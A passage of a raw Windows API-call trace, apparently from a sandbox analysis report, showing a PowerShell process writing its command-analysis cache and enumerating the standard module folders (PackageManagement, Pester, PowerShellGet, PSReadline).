[0281.517] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8a240, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0281.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a690) returned 1 [0281.517] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8a770 | out: lpFileInformation=0x653ef8a770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0281.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a650) returned 1 [0281.517] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8a0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0281.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8a5d0) returned 1 [0281.517] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7f4 [0281.518] GetFileType (hFile=0x7f4) returned 0x1 [0281.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8a540) returned 1 [0281.518] GetFileType (hFile=0x7f4) returned 0x1 [0281.518] SetEndOfFile (hFile=0x7f4) returned 1 [0281.519] WriteFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ddb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef89e18, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ddb00*, lpNumberOfBytesWritten=0x653ef89e18*=0x1000, lpOverlapped=0x0) returned 1 [0281.520] WriteFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ddb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef89fe8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ddb00*, lpNumberOfBytesWritten=0x653ef89fe8*=0x1000, lpOverlapped=0x0) returned 1 [0281.520] WriteFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ddb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef89f98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ddb00*, lpNumberOfBytesWritten=0x653ef89f98*=0x1000, lpOverlapped=0x0) returned 1 [0281.521] WriteFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ddb00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef89e18, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ddb00*, lpNumberOfBytesWritten=0x653ef89e18*=0x1000, lpOverlapped=0x0) returned 1 [0281.521] WriteFile (in: hFile=0x7f4, lpBuffer=0x25b5c0ddb00*, nNumberOfBytesToWrite=0xced, lpNumberOfBytesWritten=0x653ef8a6d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0ddb00*, lpNumberOfBytesWritten=0x653ef8a6d8*=0xced, lpOverlapped=0x0) returned 1 [0281.521] CloseHandle (hObject=0x7f4) returned 1 [0281.523] ReleaseMutex (hMutex=0x948) returned 1 [0281.523] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0281.523] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x97 [0281.523] CoTaskMemFree (pv=0x25b73d01680) [0281.523] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8aad0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0281.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8af20) returned 1 [0281.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b000 | out: lpFileInformation=0x653ef8b000*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0281.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aee0) returned 1 [0281.525] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0281.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8aad0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8af20) returned 1 [0281.540] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b000 | out: lpFileInformation=0x653ef8b000*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aee0) returned 1 [0281.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8aad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0281.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8af20) returned 1 [0281.541] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b000 | out: lpFileInformation=0x653ef8b000*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0281.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aee0) returned 1 [0281.541] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc3a0 [0281.541] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfc3a0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0281.541] CoTaskMemFree (pv=0x25b73cfc3a0) [0281.541] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8aad0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0281.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8af20) returned 1 [0281.541] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b000 | out: lpFileInformation=0x653ef8b000*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0281.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aee0) returned 1 [0281.543] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0281.557] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8aad0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8af20) returned 1 [0281.557] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b000 | out: lpFileInformation=0x653ef8b000*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aee0) returned 1 [0281.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8aad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0281.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8af20) returned 1 [0281.557] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b000 | out: lpFileInformation=0x653ef8b000*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0281.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aee0) returned 1 [0281.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ae30) returned 1 [0281.558] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8a910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.558] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8ab40 | out: lpFindFileData=0x653ef8ab40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2c10 [0281.558] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.558] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0281.559] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0281.559] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0281.559] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0281.559] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.559] FindClose (in: hFindFile=0x25b73cd2c10 | out: hFindFile=0x25b73cd2c10) returned 1 [0281.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ad60) returned 1 [0281.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ad20) returned 1 [0281.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ae30) returned 1 [0281.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8a910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.560] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8ab40 | out: lpFindFileData=0x653ef8ab40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2bb0 [0281.560] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.560] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0281.561] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0281.561] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0281.561] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0281.561] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8ab00 | out: lpFindFileData=0x653ef8ab00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0281.562] FindClose (in: hFindFile=0x25b73cd2bb0 | out: hFindFile=0x25b73cd2bb0) returned 1 [0281.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ad60) returned 1 [0281.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ad20) returned 1 [0281.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.562] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8a780, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.562] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8a9b0 | out: lpFindFileData=0x653ef8a9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.562] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.563] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0281.563] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.563] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8a780, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.563] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8a9b0 | out: lpFindFileData=0x653ef8a9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.564] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.564] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0281.564] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0281.564] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.564] SetThreadErrorMode 